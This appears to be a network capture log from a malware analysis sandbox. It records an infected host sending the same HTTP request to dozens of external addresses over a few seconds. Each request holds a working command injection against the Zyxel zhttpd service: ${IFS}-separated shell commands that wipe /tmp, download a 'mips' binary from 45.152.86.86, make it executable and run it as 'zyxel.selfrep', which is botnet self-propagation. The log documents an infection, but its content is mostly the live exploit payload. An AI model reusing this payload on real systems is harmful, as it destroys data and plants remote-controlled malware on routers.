                                        Mar 31, 2024 09:22:04.452980042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6955192.168.2.234314287.144.174.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.453008890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6956192.168.2.234619293.145.254.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.453083992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6957192.168.2.2352660135.251.33.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.453120947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6958192.168.2.2353114107.224.208.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.453182936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6959192.168.2.2356092137.46.85.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.453218937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6960192.168.2.2353836203.24.16.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.453258991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6961192.168.2.2343250204.86.163.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.453299046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6962192.168.2.2359210186.223.176.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.453344107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6963192.168.2.236030246.114.183.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.453394890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6964192.168.2.2339372193.46.85.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.453428030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6965192.168.2.235664259.49.57.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.453481913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6966192.168.2.2357014150.45.102.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:05.459331036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6967192.168.2.2343368185.168.97.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:05.459454060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6968192.168.2.2350210134.177.86.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:05.459480047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6969192.168.2.2351256152.54.183.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:05.459517002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6970192.168.2.2345130107.100.254.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:06.469475031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6971192.168.2.2346508131.234.27.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:06.469527960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6972192.168.2.234836834.242.149.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:06.469563007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6973192.168.2.2339926112.11.113.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:06.469610929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6974192.168.2.234532895.132.183.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:06.469654083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6975192.168.2.2348046165.213.230.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:06.469685078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6976192.168.2.2334160129.78.171.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:06.469753027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6977192.168.2.2333826164.146.202.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:06.469800949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6978192.168.2.234331247.117.38.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:06.469846964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6979192.168.2.233344669.126.200.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:07.479546070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6980192.168.2.2353630129.185.168.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:07.479592085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6981192.168.2.2353362221.177.165.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:07.479650021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6982192.168.2.233781213.156.124.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:07.479685068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6983192.168.2.2334902139.134.236.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:07.479729891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6984192.168.2.2349894180.220.214.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:07.479808092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6985192.168.2.2360178218.205.19.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:07.479842901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6986192.168.2.2347584217.237.96.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:07.479887009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6987192.168.2.2346174178.120.59.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:07.479944944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6988192.168.2.2335400137.130.229.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:07.479999065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6989192.168.2.2357376179.111.199.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:07.480065107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6990192.168.2.2354568153.178.92.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:07.480113029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6991192.168.2.2342046189.95.163.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:07.480135918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6992192.168.2.235030424.82.246.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:07.480196953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6993192.168.2.2353026139.209.20.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:07.480256081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6994192.168.2.2346318151.54.139.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:07.480734110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6995192.168.2.234286295.53.85.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:07.480782032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6996192.168.2.2337986110.93.24.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.498720884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6997192.168.2.2342806136.69.194.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.498759985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6998192.168.2.234343893.172.80.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.498806000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6999192.168.2.233553212.9.0.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.498871088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7000192.168.2.2338524161.164.102.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.498917103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7001192.168.2.2335104102.37.152.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.498972893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7002192.168.2.2343254206.30.81.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.499022961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7003192.168.2.2357996205.186.0.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.499062061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7004192.168.2.2348314209.192.85.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.499130011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7005192.168.2.23353982.191.236.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.499172926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7006192.168.2.233651077.54.125.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.499217987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7007192.168.2.2339402209.1.231.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.499259949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7008192.168.2.233409266.68.146.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.499291897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7009192.168.2.2342088134.41.72.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.499351025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7010192.168.2.2343178154.44.88.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.499407053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7011192.168.2.235357460.98.219.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.499464989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7012192.168.2.2334792129.78.252.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.499500036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7013192.168.2.233736040.137.231.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.499576092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7014192.168.2.233365851.193.157.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.499618053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7015192.168.2.2346688121.10.106.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.499701023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7016192.168.2.2349694146.209.234.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.499737978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7017192.168.2.234395245.74.113.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.499775887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7018192.168.2.2340118122.150.77.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.499835014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7019192.168.2.2347776171.48.255.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.499887943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7020192.168.2.234961819.96.152.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.499938011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7021192.168.2.2345080168.8.187.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.499999046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7022192.168.2.23575925.20.18.28443
                                        TimestampBytes transferredDirectionData
